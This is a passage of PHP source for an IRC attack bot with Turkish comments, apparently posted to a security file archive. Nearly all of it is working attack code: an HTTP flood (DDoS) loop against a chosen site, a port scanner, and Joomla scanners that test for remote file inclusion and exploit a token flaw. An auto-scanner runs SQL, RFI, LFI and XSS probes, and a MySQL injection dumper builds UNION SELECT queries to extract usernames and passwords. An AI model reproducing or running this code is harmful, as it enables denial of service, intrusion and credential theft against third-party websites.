$site = $this->ex[4];
$path = $this->ex[5];
$atak = $this->ex[6];
$this->yaz($this->turuncu . $site . " için DDos Baþladi");
for( $i = 0; $i <=$atak ; $i++ )
{

$fp = fsockopen( $site, 80, $errno, $errstr, 30 );
if( $fp )
{
$out = "GET /".$path." HTTP/1.1\r\n";
$out .= "Host: ".$site."\r\n";
$out .= "Keep-Alive: 300\r\n";
$out .= "Connection: keep-alive\r\n\r\n";
fwrite( $fp, $out );
fclose( $fp );
}
}
$this->yaz($this->turuncu . $site . " için DDos bitti");
}

#PORT SCANNER V2.0 da eklendi
private function port_scanner()
{
$ip = $this->ex[4];
$basla = $this->ex[5];
$bit = $this->ex[6];
$this->yaz($this->turuncu . "Port Taramasi Baþladi");
$this->yaz($this->turuncu . "Tarama Yapýlacak IP/Domain : " . $this->yesil ." ". $ip);
for($i=$basla ; $i<=$bit ; $i++)
{

$socket = fsockopen($ip,$i,$hatano,$hatastr,3);
if($socket)
{
$this->yaz($this->kirmizi ." ". $i . $this->yesil . " Nolu Port Açýk");
}
}
}

#Joomla RFI Scanner
private function joom_rfi($domain)
{
$kaynak = $this->get($this->joom_rfi);
$ayir = explode("\n",$kaynak);
$this->yaz($this->yesil . " ". count($ayir) ." Adet Kayýtlý Açýk ile RFI taranýyor ");
foreach ( $ayir as $liste )
{

$bug = trim($liste);
//$this->yaz($this->turuncu ."Denenen RFI Bug " .$this->mavi . $bug);
if( eregi($this->rfi_regex,$this->get($domain.$bug.$this->shell_adresi)) )
{
$this->yaz($this->kirmizi ."Joomla RFI " . $this->yesil . $domain.$bug);
}
elseif( eregi($this->rfi_regex,$this->get($domain.$bug.$this->shell_adresi."?")) )
{
$this->yaz($this->kirmizi ."Joomla RFI " . $this->yesil . $domain.$bug);
}
}
$this->yaz($this->yesil . "Joomla RFI Tarama Sona Erdi");
}

#Joomla Token Scanner
private function joom_token($domain)
{

$domain = trim($domain);
$kaynak = $this->get($domain . $this->token_ilk);
preg_match($this->md5_regex,$kaynak,$hash);
$this->yaz($this->turuncu ."Token Alýndý.Deðer: ". $this->yesil ." ".$hash[0]);
$kaynak = $this->post($domain.$this->token_son,"token=%27&".$hash[0]."=1");
if ( eregi ("password1",$kaynak) and eregi ("password2",$kaynak) )
{
$this->yaz($this->kirmizi . "Joomla Token Bug Bulundu : " . $domain);
}
$this->yaz($domain ." için token aramasý sona erdi");
}

#Joomla Auto Scanner
private function joom_auto()
{
$kaynak = $this->get2($this->incele_joomla);
$ayir = explode("\n",$kaynak);
foreach($ayir as $ayrik)
{

$site = trim($ayrik);
$this->yaz($this->yesil ."Denenen Joomla ".$site);
$this->joom_token($site);
$this->joom_rfi($site);
}

}

#site inceleme
private function ozgun_site($kaynak,$domain)
{

//$domain = $domain."/";
//OLD Version $kaynak = $this->get($domain);
preg_match_all($this->link_regex,$kaynak,$linkler);
foreach($linkler[1] as $link)
{
echo $link."<br>";
if ( strstr ($link,"?") )
{
$ayir = explode('?',$link);
$ac = fopen($this->ozgun_site,'ab');
if (! eregi ($ayir[0],file_get_contents($this->ozgun_site)) )
{
if( eregi ("http://",$link) and !eregi ($domain,$link) )
{
}
else
{
if( !eregi ("http://",$link))
{
$link = $domain."/".$link;
}
fwrite($ac,$link."\n");
}
}
}
}
}

#özgün auto
private function ozgun()
{
$kaynak = $this->get2($this->ozgun_site);
$ayir = explode("\n",$kaynak);
foreach($ayir as $ayrik)
{

$link = trim($ayrik);
$this->yaz($this->yesil ."Taranan Site" . $this->kirmizi . " " . $link);
$this->sql($link);
$this->rfi($link);
$this->lfi($link);
$this->xss($link);
}
}

private function bug_kayit($bug)
{

$ac = fopen( $this->bug_log,'ab' );
fwrite($ac,$bug."\n");
fclose($ac);
$ac = fopen( $this->toplu_bug,'ab' );
fwrite($ac,$this->url_kisalt($bug)."\n");
fclose($ac);
$this->yaz($this->turuncu . "Bulunan Bug Kaydedildi");
}

#Youtube Downloader V.2.1
#Verilen Youtube Linkindeki videoyu download eder
#Örnek Komut -> !youtube http://www.youtube.com/watch?v=-e_mZCmFJwI
private function youtube_isim($link)
{
//Method sonunda regex ile alýnan video linklerinin push edileceði Array
$linkler = array();
//Videonun olduðu sayfanýn kaynaðý alýnýr
$kaynak = $this->get($link);
//Kaynaktan Video ismi Çekilier
preg_match($this->youtube_isim,$kaynak,$name);
//Çekilen Video isminden gereksiz bölgeler çýkartýlýr
$isim = substr($name[1],23,-3);
//Kanala Durum bildirilir
$this->yaz("You".$this->kirmizi . "Tube " . $this->siyah .$isim . " isimli Video indirilmeye basladi Lütfen Sabirlica Bekleyiniz!");
//
$kaynak = str_replace('\/\/','//',$kaynak);
preg_match_all($this->youtube_regex,$kaynak,$xxx);

foreach($xxx[0] as $x)
{
$x = rawurldecode($x);
$x = str_replace('%2C',',',$x);
$x = str_replace('\/','/',$x);
if(!eregi('generate',$x))
{
array_push($linkler,$x);
}
}

$linkler = array_unique($linkler);

#CURL ile Download
$video = $this->get($linkler[0]);
file_put_contents("Youtube/".$isim.".flv",$video);
$this->yaz("Video '".$isim."' ismi ile kaydedildi");
}

#MySQL Injection Dumper V.2.1
#MySQL Injection olan sitelerde gerekli bilgiler verildiðinde sistem username ve password çekerek Kaydeder
#Örnek Komut -> !dump www.burtay.org/index.php?id=3 20 13 username password admin --
private function dump()
{
$site = $this->ex[4];
$kolon_sayisi = $this->ex[5];
$etkilenen_kolon = $this->ex[6];
$username = $this->ex[7];
$password = $this->ex[8];
$tablo = $this->ex[9];
$son = $this->ex[10];

$colons = 'concat('.$this->hex_code[0].','.$username.',0x3a,'.$password.','.$this->hex_code[1].')';
$counts = 'concat('.$this->hex_code[0].',count('.$username.'),'.$this->hex_code[1].')';
$colon = null;
$count = null;
for($i=1 ; $i<=$kolon_sayisi ; $i++)
{
//Etkilenen Kolon ve kolon sayisi 1 ise
if( $kolon_sayisi==1 )
{
$colon = $colons;
$count = $counts;
}
elseif( $i == $etkilenen_kolon )
{
$colon = $colon . ','. $colons;
$count = $count . ','. $counts;
}

elseif( $colon == null )
{
$colon = $i;
$count = $i;
}
else
{
$colon = $colon . ','. $i;
$count = $count . ','. $i;
}
}

$say = $site . "+and+1=0+union+select+".$count."+from+".$tablo.$son;
$kaynak = $this->get($say);
preg_match($this->dumper_regex,$kaynak,$toplam);
$info = "[+] Total ". $toplam[1] ." User-Pass List";
$this->yaz($this->kirmizi."[+] MySQL Injection Site -> ". $site );
$this->yaz($this->kirmizi."[+] Total Column Number -> ". $kolon_sayisi);
$this->yaz($this->kirmizi."[+] Effected Colon Number -> ". $etkilenen_kolon);
$this->yaz($this->kirmizi."[+] Username Colon Name -> ". $username);
$this->yaz($this->kirmizi."[+] Password Colon Name -> ". $password);
$this->yaz($this->kirmizi."[+] Table Name -> ". $tablo);
$this->yaz($this->kirmizi . $info);
$this->kaydet($site,$info);
$this->kaydet($site,"[+] URL->".$say);

for($k=0; $k<=$toplam[1] ; $k++)
{
$m = $k+1;
$sites = $site . '+aNd+1=0+uNioN+SeLeCt+'.$colon.'+fRom+'.$tablo.'+limit+'.$k.',1'.$son;
$kaynak = $this->get($sites);
preg_match($this->dumper_regex,$kaynak,$list);
$this->yaz( "[". $m ."] ".$list[1]);
$this->kaydet($site,$list[1]);
}
$this->yaz( "MySQL DUMP islemi Bitti");
}

}

$class = new IRC_BOT();

?>
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close